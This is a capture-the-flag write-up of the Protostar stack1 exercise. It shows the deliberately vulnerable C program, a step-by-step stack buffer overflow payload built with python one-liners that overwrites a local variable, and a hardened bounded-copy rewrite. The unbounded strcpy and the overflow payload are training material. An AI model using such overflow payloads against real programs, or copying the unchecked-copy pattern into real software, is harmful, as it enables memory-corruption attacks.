Protostar - stack1

This is my second post in the Protostar series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:



Additionally, we check out the stack1.c source code:

#include <err.h>       /* errx(); the original listing omits this header */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;   /* the variable we need to overwrite */
  char buffer[64];         /* 64-byte buffer that argv[1] is copied into */

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]); /* unbounded copy: anything past 63 characters overflows */

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

Okay, looking at the code, we need to fill the buffer and then overwrite the variable "modified" so that it holds the value 0x61626364.

To accomplish this, we first fill the buffer with 64 bytes and then add one more to see where the overflow begins:


$ ./stack1 $(python -c 'print "A" * 64')
Try again, you got 0x00000000
$ ./stack1 $(python -c 'print "A" * 65')
Try again, you got 0x00000041
$ 

We notice that after sending 65 bytes, the 65th byte shows up in the output: 0x41 is the ASCII code for "A". It looks like the buffer is 64 bytes, and everything beyond it overwrites "modified".

Let's test another theory by adding the letter B 4 more times after our 64 bytes:


$ ./stack1 $(python -c 'print "A" * 64 + "B" * 4')
Try again, you got 0x42424242
$ 

Excellent! Now we need to thoroughly understand what is asked of us in this program.

After filling the 64-byte buffer, the next 4 bytes land in the "modified" variable. Currently its value is 0x42424242 ("B" is 0x42). However, we need it to read 0x61626364. Since we are already told this is little endian, the least significant byte is stored first, so we write the bytes in reverse: \x64\x63\x62\x61.

Let's update our payload:


$ ./stack1 $(python -c 'print "A" * 64 + "\x64\x63\x62\x61"')
you have correctly got the variable to the right value
$ 

Success!
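For contrast, here is what the same program looks like once the copy is bounded. This is an added example written for this write-up, not code from the Protostar challenge or Exploit Exercises; the function names (bounded_copy, stack1_hardened, le32_byte, overflow_sample, fitting_sample) are my own, and it assumes a little-endian x86 target like the Protostar VM. The hardened logic rejects any argument that does not fit in the 64-byte buffer, so the 64 'A's plus "\x64\x63\x62\x61" argument that solves the original binary can no longer reach "modified". le32_byte shows the byte order the payload relies on: byte 0 of 0x61626364 in memory is 0x64.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64
#define TARGET   0x61626364u

/* Bounded replacement for the strcpy() in stack1.c: copies src into dst
 * only if the whole string, terminator included, fits. Returns 0 on
 * success and -1 (leaving dst empty) if src is too long. The original
 * strcpy() keeps writing past buffer[63], which is how argv[1] reaches
 * 'modified' at all. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    const char *nul = memchr(src, '\0', dst_size); /* NUL within dst_size? */
    if (nul == NULL) {            /* no terminator in the first dst_size bytes */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);     /* copies the NUL too */
    return 0;
}

/* Hardened version of stack1's main() logic, as a function so it can be
 * tested. Returns -1 if the argument was rejected, otherwise the value of
 * 'modified' after the copy (which, without the overflow, stays 0). */
long long stack1_hardened(const char *arg)
{
    volatile uint32_t modified = 0;   /* same variable as in stack1.c */
    char buffer[BUF_SIZE];

    if (bounded_copy(buffer, sizeof buffer, arg) != 0)
        return -1;
    return (long long)modified;
}

/* Little-endian byte order used in the write-up: byte i of the in-memory
 * representation of v. For 0x61626364 this is 0x64, 0x63, 0x62, 0x61. */
unsigned char le32_byte(uint32_t v, int i)
{
    return (unsigned char)(v >> (8 * i));
}

/* Constructed sample input: 64 'A's followed by "\x64\x63\x62\x61", the
 * argument that solves the original binary. Built here, not read from argv. */
const char *overflow_sample(void)
{
    static char s[BUF_SIZE + 5];
    memset(s, 'A', BUF_SIZE);
    memcpy(s + BUF_SIZE, "\x64\x63\x62\x61", 5);   /* 4 bytes plus NUL */
    return s;
}

/* Constructed sample that just fits: 63 'A's plus the terminator. */
const char *fitting_sample(void)
{
    static char s[BUF_SIZE];
    memset(s, 'A', BUF_SIZE - 1);
    s[BUF_SIZE - 1] = '\0';
    return s;
}

int main(int argc, char **argv)
{
    const char *arg = argc > 1 ? argv[1] : overflow_sample();
    long long r = stack1_hardened(arg);
    if (r < 0)
        printf("argument rejected: longer than %d bytes\n", BUF_SIZE - 1);
    else
        printf("modified = 0x%08llx (%s)\n", r,
               r == TARGET ? "solved" : "not solved");
    return 0;
}
```

Compile with gcc and run it with the same $(python -c ...) argument as above: the long argument is rejected instead of silently spilling into "modified". Note that even 64 'A's would be rejected here, because the original strcpy() already writes its NUL terminator one byte past the buffer in that case; it just happened to land on a byte of "modified" that was already zero.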

Thanks for reading.

-geoda